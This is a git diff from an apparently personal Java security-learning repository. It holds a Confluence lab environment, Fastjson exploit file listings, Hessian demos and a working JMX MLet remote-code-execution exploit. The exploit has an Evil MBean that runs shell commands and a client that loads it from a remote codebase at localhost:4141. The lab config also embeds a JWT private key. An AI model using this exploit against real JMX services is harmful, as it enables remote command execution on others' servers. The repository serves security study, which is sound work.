+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\XXE\src\main\java\com\drunkbaby\XXEApplication.java
diff --git a/JavaSecurity/Confluence/CVE-2023-22518/xmlexport-20231109-060519-1.zip b/JavaSecurity/Confluence/CVE-2023-22518/xmlexport-20231109-060519-1.zip
new file mode 100644
index 00000000..62e1b100
Binary files /dev/null and b/JavaSecurity/Confluence/CVE-2023-22518/xmlexport-20231109-060519-1.zip differ
diff --git a/JavaSecurity/Confluence/env/Dockerfile b/JavaSecurity/Confluence/env/Dockerfile
new file mode 100644
index 00000000..c2bd500a
--- /dev/null
+++ b/JavaSecurity/Confluence/env/Dockerfile
@@ -0,0 +1,11 @@
+FROM openjdk:11-jdk-bullseye
+
+COPY atlassian-confluence-8.5.3.zip /
+COPY confluence.cfg.xml /var/data/confluence/confluence.cfg.xml
+
+RUN unzip atlassian-confluence-8.5.3.zip && \ 
+ mv atlassian-confluence-8.5.3 atlassian-confluence && \
+ mkdir -p /var/data/confluence/ && \
+ mkdir -p /var/data/clusters && \
+ echo ' '>> /atlassian-confluence/confluence/WEB-INF/classes/confluence-init.properties && \
+ echo 'confluence.home=/var/data/confluence/'>> /atlassian-confluence/confluence/WEB-INF/classes/confluence-init.properties
diff --git a/JavaSecurity/Confluence/env/confluence.cfg.xml b/JavaSecurity/Confluence/env/confluence.cfg.xml
new file mode 100644
index 00000000..6973cab0
--- /dev/null
+++ b/JavaSecurity/Confluence/env/confluence.cfg.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<confluence-configuration>
+ <setupstep>setupdbchoice-start</setupstep>
+ <setuptype>cluster</setuptype>
+ <buildnumber>7701</buildnumber>
+ <properties>
+ <property name="atlassian.license.message">AAABlA0ODAoPeNp1klFvmzAUhd/9K5D20qlya0MXIJKlUSBZOkLaQlJlyotrXRK3QCID6divn1Mnq lq1j77n+Pq75/pbvumsCIRFXIv6Q5sMnSsrzHLLJraDQgW8lds64i2wQwVTGxMPRdAIJXcHiYXbu ig7qAVYZ9rHrRDqFtT31dCK97zsXhugKZe6WnNti//upOpPLa8woZi4KJEC6uYLsTTiAlRzeNJGW ff4RtCqDpDQGBdpVz2CmhXzRjsZpuiNwLhmas1r2ZhK3/W8Xj9JXv5cV1yWF2JbmT5ctHIP5oqer 9XnWE9Qfn7lSPeLNxs2DV/CUewv/z25Fb07zwux9MejYMQj+1n8qUWwuV+353Y+rpaDKP79wB+8Y lG9JEEaXo7vVmzFDMExjrzfQcorYOFsOo3vw0mQGD1rudIps4KXDZzCm0QsmURZnOKE+p47oD8cl IHag9LKtR/McbrIr3Gcux6+8cjctDoszezMDPwM/SloOiDEJZ7jUHTbKbHhDXz8Csd4XiE/TUfjs PdI/wGum893MCwCFEBm/Dhfacgh6q8z1KkLA7IoRtgMAhR3aSuUYcM2Bt0xGXVKCB533E+uyg==X 02jj</property>
+ <property name="confluence.cluster">true</property>
+ <property name="confluence.cluster.address">238.49.135.165</property>
+ <property name="confluence.cluster.home">/var/data/clusters</property>
+ <property name="confluence.cluster.interface">eth0</property>
+ <property name="confluence.cluster.join.type">multicast</property>
+ <property name="confluence.cluster.name">clusterA</property>
+ <property name="confluence.cluster.ttl">1</property>
+ <property name="confluence.setup.server.id">B9AU-NVTB-ET78-J80U</property>
+ 
+ <property name="jwt.private.key">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</property>
+ <property name="jwt.public.key">MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAkP0PJ779cjmR3XA3dE3DPloM79asNOd4pjQY9lmsUpg7b//3F4ugIBLvIouF44m8/TMjgteMYhh7EPj1jch7JV6uMilWb4POdbgod5zUlHESnExqfZ0tHSFsiYFVJCBgq3dzsMaSkDxxLKBYiua+wJ8AThXdNuclDb7FK+vZC2IRgA+KwQGOCbEVhUP1qbpwpBTAiD62j7HnKsBcTd0WApiNq6Q0dPAZUH0lWkNwQkTbU58R29AicgD9Twwmi3A5fLytlk9P+/kNZS9CiklPTdicq/1xzuaQedYZsZQEBiz0jos2VpVqwZYSPcPUxUns1t64rXG3iqhlSUc8Rdr+oy6smgERX9WziQHcRmG7hwreZofRzfFddYR8q3N5QC/Rhj5KAcO9o1B0FXyYojURAkxviyVHvA15mf9z0P7oFneVMIEEJSixtUEhswKXUBQmr07t7SX9LIvwd98mNyipECG3uPrdY6hQzD2bFwfvreFSJlXiTc5cRQmgYLItQw4TAgMBAAE=</property>
+ <property name="lucene.index.dir">${localHome}/index</property>
+ <property name="synchrony.btf">false</property>
+ <property name="synchrony.encryption.disabled">true</property>
+ <property name="synchrony.proxy.enabled">true</property>
+ <property name="webwork.multipart.saveDir">${localHome}/temp</property>
+ </properties>
+</confluence-configuration>
\ No newline at end of file
diff --git a/JavaSecurity/Confluence/env/docker-compose.yml b/JavaSecurity/Confluence/env/docker-compose.yml
new file mode 100644
index 00000000..1482b945
--- /dev/null
+++ b/JavaSecurity/Confluence/env/docker-compose.yml
@@ -0,0 +1,22 @@
+services:
+ confluence:
+ build: .
+ ports:
+ - "8090:8090"
+ - "5005:5005"
+ environment:
+ - CATALINA_OPTS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005
+ depends_on:
+ - postgres
+ command: /atlassian-confluence/bin/start-confluence.sh --fg
+
+ postgres:
+ image: postgres:12-alpine3.19
+ expose:
+ - 5432
+ environment:
+ - POSTGRES_PASSWORD=postgres
+ command:
+ - sh
+ - -c
+ - echo 'CREATE DATABASE confluence;'> /docker-entrypoint-initdb.d/init.sql && /usr/local/bin/docker-entrypoint.sh postgres
\ No newline at end of file
diff --git a/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/FastjsonEXP_1.2.24-1.0-SNAPSHOT.jar b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/FastjsonEXP_1.2.24-1.0-SNAPSHOT.jar
new file mode 100644
index 00000000..6d477c60
Binary files /dev/null and b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/FastjsonEXP_1.2.24-1.0-SNAPSHOT.jar differ
diff --git a/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-archiver/pom.properties b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-archiver/pom.properties
new file mode 100644
index 00000000..bf75727c
--- /dev/null
+++ b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-archiver/pom.properties
@@ -0,0 +1,5 @@
+#Generated by Maven
+#Thu Feb 22 21:20:13 CST 2024
+version=1.0-SNAPSHOT
+groupId=org.example
+artifactId=FastjsonEXP_1.2.24
diff --git a/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
new file mode 100644
index 00000000..8be5a072
--- /dev/null
+++ b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
@@ -0,0 +1,4 @@
+G:\OneDrive - yapuu\Java安全学习\JavaSecurityLearning\JavaSecurity\Fastjson\FastjsonEXP_1.2.24\src\main\java\JdbcRowSetImplLdapExp.java
+G:\OneDrive - yapuu\Java安全学习\JavaSecurityLearning\JavaSecurity\Fastjson\FastjsonEXP_1.2.24\src\main\java\TemplatesImplPoc.java
+G:\OneDrive - yapuu\Java安全学习\JavaSecurityLearning\JavaSecurity\Fastjson\FastjsonEXP_1.2.24\src\main\java\HighJdkBypass.java
+G:\OneDrive - yapuu\Java安全学习\JavaSecurityLearning\JavaSecurity\Fastjson\FastjsonEXP_1.2.24\src\main\java\JdbcRowSetImplRmiExp.java
diff --git a/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst b/JavaSecurity/Fastjson/FastjsonEXP_1.2.24/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/Hession/.gitignore b/JavaSecurity/Hession/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/Hession/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/Hession/HessionLearn/pom.xml b/JavaSecurity/Hession/HessionLearn/pom.xml
new file mode 100644
index 00000000..5bf8695a
--- /dev/null
+++ b/JavaSecurity/Hession/HessionLearn/pom.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <parent>
+ <groupid>org.example</groupid>
+ <artifactid>Hession</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ </parent>
+
+ <artifactid>HessionLearn</artifactid>
+
+ <dependencies>
+ <dependency>
+ <groupid>com.caucho</groupid>
+ <artifactid>hessian</artifactid>
+ <version>4.0.63</version>
+ </dependency>
+ </dependencies>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ </properties>
+
+</project>
\ No newline at end of file
diff --git a/JavaSecurity/Hession/HessionLearn/src/main/java/com/hession/test/Hessian_Test.java b/JavaSecurity/Hession/HessionLearn/src/main/java/com/hession/test/Hessian_Test.java
new file mode 100644
index 00000000..e672314c
--- /dev/null
+++ b/JavaSecurity/Hession/HessionLearn/src/main/java/com/hession/test/Hessian_Test.java
@@ -0,0 +1,37 @@
+package com.hession.test;
+
+import com.caucho.hessian.io.HessianInput;
+import com.caucho.hessian.io.HessianOutput;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.Serializable;
+
+public class Hessian_Test implements Serializable {
+
+ public static <t> byte[] serialize(T o) throws IOException {
+ ByteArrayOutputStream bao = new ByteArrayOutputStream();
+ HessianOutput output = new HessianOutput(bao);
+ output.writeObject(o);
+ System.out.println(bao.toString());
+ return bao.toByteArray();
+ }
+
+ public static <t> T deserialize(byte[] bytes) throws IOException {
+ ByteArrayInputStream bai = new ByteArrayInputStream(bytes);
+ HessianInput input = new HessianInput(bai);
+ Object o = input.readObject();
+ return (T) o;
+ }
+
+ public static void main(String[] args) throws IOException {
+ Person person = new Person();
+ person.setAge(18);
+ person.setName("Drunkbaby");
+
+ byte[] s = serialize(person);
+ System.out.println((Person) deserialize(s));
+ }
+
+}
\ No newline at end of file
diff --git a/JavaSecurity/Hession/HessionLearn/src/main/java/com/hession/test/Person.java b/JavaSecurity/Hession/HessionLearn/src/main/java/com/hession/test/Person.java
new file mode 100644
index 00000000..2350bb99
--- /dev/null
+++ b/JavaSecurity/Hession/HessionLearn/src/main/java/com/hession/test/Person.java
@@ -0,0 +1,29 @@
+package com.hession.test;
+
+import java.io.Serializable;
+
+public class Person implements Serializable {
+ public String name;
+ public int age;
+
+ public int getAge() {
+ return age;
+ }
+
+ @Override
+ public String toString() {
+ return super.toString();
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setAge(int age) {
+ this.age = age;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Hession/pom.xml b/JavaSecurity/Hession/pom.xml
new file mode 100644
index 00000000..8b655d49
--- /dev/null
+++ b/JavaSecurity/Hession/pom.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+
+ <groupid>org.example</groupid>
+ <artifactid>Hession</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <packaging>pom</packaging>
+ <modules>
+ <module>HessionLearn</module>
+ </modules>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ </properties>
+
+</project>
\ No newline at end of file
diff --git a/JavaSecurity/Hession/src/main/java/org/example/Main.java b/JavaSecurity/Hession/src/main/java/org/example/Main.java
new file mode 100644
index 00000000..407f157b
--- /dev/null
+++ b/JavaSecurity/Hession/src/main/java/org/example/Main.java
@@ -0,0 +1,7 @@
+package org.example;
+
+public class Main {
+ public static void main(String[] args) {
+ System.out.println("Hello world!");
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/.DS_Store b/JavaSecurity/JDK/.DS_Store
new file mode 100644
index 00000000..a8a3f43f
Binary files /dev/null and b/JavaSecurity/JDK/.DS_Store differ
diff --git a/JavaSecurity/JDK/JMX/.gitignore b/JavaSecurity/JDK/JMX/.gitignore
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/.gitignore
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git a/JavaSecurity/JDK/JMX/pom.xml b/JavaSecurity/JDK/JMX/pom.xml
new file mode 100644
index 00000000..409550e6
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/pom.xml
@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelversion>4.0.0</modelversion>
+
+ <groupid>org.example</groupid>
+ <artifactid>JMX</artifactid>
+ <version>1.0-SNAPSHOT</version>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ <project.build.sourceencoding>UTF-8</project.build.sourceencoding>
+ </properties>
+
+</project>
\ No newline at end of file
diff --git a/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/Evil.java b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/Evil.java
new file mode 100644
index 00000000..2cdbca28
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/Evil.java
@@ -0,0 +1,33 @@
+package com.drunkbaby.mlet;
+
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+
+public class Evil implements EvilMBean
+{
+ public String runCommand(String cmd)
+ {
+ try {
+ Runtime rt = Runtime.getRuntime();
+ Process proc = rt.exec(cmd);
+ BufferedReader stdInput = new BufferedReader(new InputStreamReader(proc.getInputStream()));
+ BufferedReader stdError = new BufferedReader(new InputStreamReader(proc.getErrorStream()));
+ String stdout_err_data = "";
+ String s;
+ while ((s = stdInput.readLine()) != null)
+ {
+ stdout_err_data += s+"\n";
+ }
+ while ((s = stdError.readLine()) != null)
+ {
+ stdout_err_data += s+"\n";
+ }
+ proc.waitFor();
+ return stdout_err_data;
+ }
+ catch (Exception e)
+ {
+ return e.toString();
+ }
+ }
+}
diff --git a/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/EvilMBean.java b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/EvilMBean.java
new file mode 100644
index 00000000..8637c221
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/EvilMBean.java
@@ -0,0 +1,5 @@
+package com.drunkbaby.mlet;
+
+public interface EvilMBean {
+ public String runCommand(String cmd);
+}
diff --git a/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/ExploitJMXByRemoteMBean.java b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/ExploitJMXByRemoteMBean.java
new file mode 100644
index 00000000..152c7878
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/ExploitJMXByRemoteMBean.java
@@ -0,0 +1,66 @@
+package com.drunkbaby.mlet;
+
+import javax.management.MBeanServerConnection;
+import javax.management.ObjectInstance;
+import javax.management.ObjectName;
+import javax.management.remote.JMXConnector;
+import javax.management.remote.JMXConnectorFactory;
+import javax.management.remote.JMXServiceURL;
+import java.net.MalformedURLException;
+import java.util.HashSet;
+import java.util.Iterator;
+
+public class ExploitJMXByRemoteMBean {
+
+ public static void main(String[] args) {
+ try {
+// connectAndOwn(args[0], args[1], args[2]);
+ connectAndOwn("localhost","1099","open -a Calculator");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ static void connectAndOwn(String serverName, String port, String command) throws MalformedURLException {
+ try {
+ // step1. 通过rmi创建 jmx连接
+ JMXServiceURL u = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + serverName + ":" + port + "/jmxrmi");
+ System.out.println("URL: " + u + ", connecting");
+ JMXConnector c = JMXConnectorFactory.connect(u);
+ System.out.println("Connected: " + c.getConnectionId());
+ MBeanServerConnection m = c.getMBeanServerConnection();
+
+ // step2. 加载特殊MBean:javax.management.loading.MLet
+ ObjectInstance evil_bean = null;
+ ObjectInstance evil = null;
+ try {
+ evil = m.createMBean("javax.management.loading.MLet", null);
+ } catch (javax.management.InstanceAlreadyExistsException e) {
+ evil = m.getObjectInstance(new ObjectName("DefaultDomain:type=MLet"));
+ }
+ // step3:通过MLet加载远程恶意MBean
+ System.out.println("Loaded "+evil.getClassName());
+ Object res = m.invoke(evil.getObjectName(), "getMBeansFromURL", new Object[]
+ { "http://localhost:4141/evil.html"},
+ new String[] { String.class.getName() } );
+
+ HashSet res_set = ((HashSet)res);
+ Iterator itr = res_set.iterator();
+ Object nextObject = itr.next();
+ if (nextObject instanceof Exception)
+ {
+ throw ((Exception)nextObject);
+ }
+ evil_bean = ((ObjectInstance)nextObject);
+
+ // step4: 执行恶意MBean
+ System.out.println("Loaded class: "+evil_bean.getClassName()+" object "+evil_bean.getObjectName());
+ System.out.println("Calling runCommand with: "+command);
+ Object result = m.invoke(evil_bean.getObjectName(), "runCommand", new Object[]{ command }, new String[]{ String.class.getName() });
+ System.out.println("Result: "+result);
+ } catch (Exception e)
+ {
+ e.printStackTrace();
+ }
+ }
+}
diff --git a/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/JMX.jar b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/JMX.jar
new file mode 100644
index 00000000..ba2a5d4b
Binary files /dev/null and b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/JMX.jar differ
diff --git a/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/evil.html b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/evil.html
new file mode 100644
index 00000000..6ed4d9dd
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/com/drunkbaby/mlet/evil.html
@@ -0,0 +1 @@
+<html><mlet code="com.drunkbaby.mlet.Evil" archive="JMX.jar" name="MLetCompromise:name=evil,id=1" codebase="http://127.0.0.1:4141"></mlet></html>
\ No newline at end of file
diff --git a/JavaSecurity/JDK/JMX/src/main/java/org/example/HelloWorld.java b/JavaSecurity/JDK/JMX/src/main/java/org/example/HelloWorld.java
new file mode 100644
index 00000000..242db8dc
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/org/example/HelloWorld.java
@@ -0,0 +1,19 @@
+package org.example;
+
+public class HelloWorld implements HelloWorldMBean{
+ private String name = "Drunkbaby";
+ @Override
+ public void sayhello() {
+ System.out.println("hello world" + this.name);
+ }
+
+ @Override
+ public int add(int x, int y) {
+ return x + y;
+ }
+
+ @Override
+ public String getName() {
+ return this.name;
+ }
+}
diff --git a/JavaSecurity/JDK/JMX/src/main/java/org/example/HelloWorldMBean.java b/JavaSecurity/JDK/JMX/src/main/java/org/example/HelloWorldMBean.java
new file mode 100644
index 00000000..22008cd7
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/org/example/HelloWorldMBean.java
@@ -0,0 +1,7 @@
+package org.example;
+
+public interface HelloWorldMBean {
+ public void sayhello();
+ public int add(int x, int y);
+ public String getName();
+}
diff --git a/JavaSecurity/JDK/JMX/src/main/java/org/example/Main.java b/JavaSecurity/JDK/JMX/src/main/java/org/example/Main.java
new file mode 100644
index 00000000..407f157b
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/org/example/Main.java
@@ -0,0 +1,7 @@
+package org.example;
+
+public class Main {
+ public static void main(String[] args) {
+ System.out.println("Hello world!");
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/JMX/src/main/java/org/example/jmxDemo.java b/JavaSecurity/JDK/JMX/src/main/java/org/example/jmxDemo.java
new file mode 100644
index 00000000..8e04e43c
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/java/org/example/jmxDemo.java
@@ -0,0 +1,32 @@
+package org.example;
+
+import javax.management.MBeanServer;
+import javax.management.ObjectName;
+import javax.management.remote.JMXConnectorServer;
+import javax.management.remote.JMXConnectorServerFactory;
+import javax.management.remote.JMXServiceURL;
+import java.lang.management.ManagementFactory;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+public class jmxDemo {
+ public static void main(String[] args) throws Exception{
+ MBeanServer mBeanServer = ManagementFactory.getPlatformMBeanServer();
+ ObjectName mbsName = new ObjectName("test:type=HelloWorld");
+ HelloWorld mbean = new HelloWorld();
+ mBeanServer.registerMBean(mbean, mbsName);
+
+ // 创建一个 RMI Registry
+ Registry registry = LocateRegistry.createRegistry(1099);
+ // 构造 JMXServiceURL,绑定创建的 RMI
+ JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi");
+ // 构造JMXConnectorServer,关联 mbserver
+ JMXConnectorServer jmxConnectorServer = JMXConnectorServerFactory.newJMXConnectorServer(jmxServiceURL, null, mBeanServer);
+ jmxConnectorServer.start();
+ System.out.println("JMXConnectorServer is ready");
+
+ System.out.println("press any key to exit.");
+ System.in.read();
+
+ }
+}
diff --git a/JavaSecurity/JDK/JMX/src/main/resources/META-INF/MANIFEST.MF b/JavaSecurity/JDK/JMX/src/main/resources/META-INF/MANIFEST.MF
new file mode 100644
index 00000000..c304d41c
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/resources/META-INF/MANIFEST.MF
@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+Main-Class: org.example.Main
+
diff --git a/JavaSecurity/JDK/JMX/src/main/resources/evil.html b/JavaSecurity/JDK/JMX/src/main/resources/evil.html
new file mode 100644
index 00000000..6ed4d9dd
--- /dev/null
+++ b/JavaSecurity/JDK/JMX/src/main/resources/evil.html
@@ -0,0 +1 @@
+<html><mlet code="com.drunkbaby.mlet.Evil" archive="JMX.jar" name="MLetCompromise:name=evil,id=1" codebase="http://127.0.0.1:4141"></mlet></html>
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/.bsp/sbt.json b/JavaSecurity/JDK/Scala1/.bsp/sbt.json
new file mode 100644
index 00000000..2386def0
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/.bsp/sbt.json
@@ -0,0 +1 @@
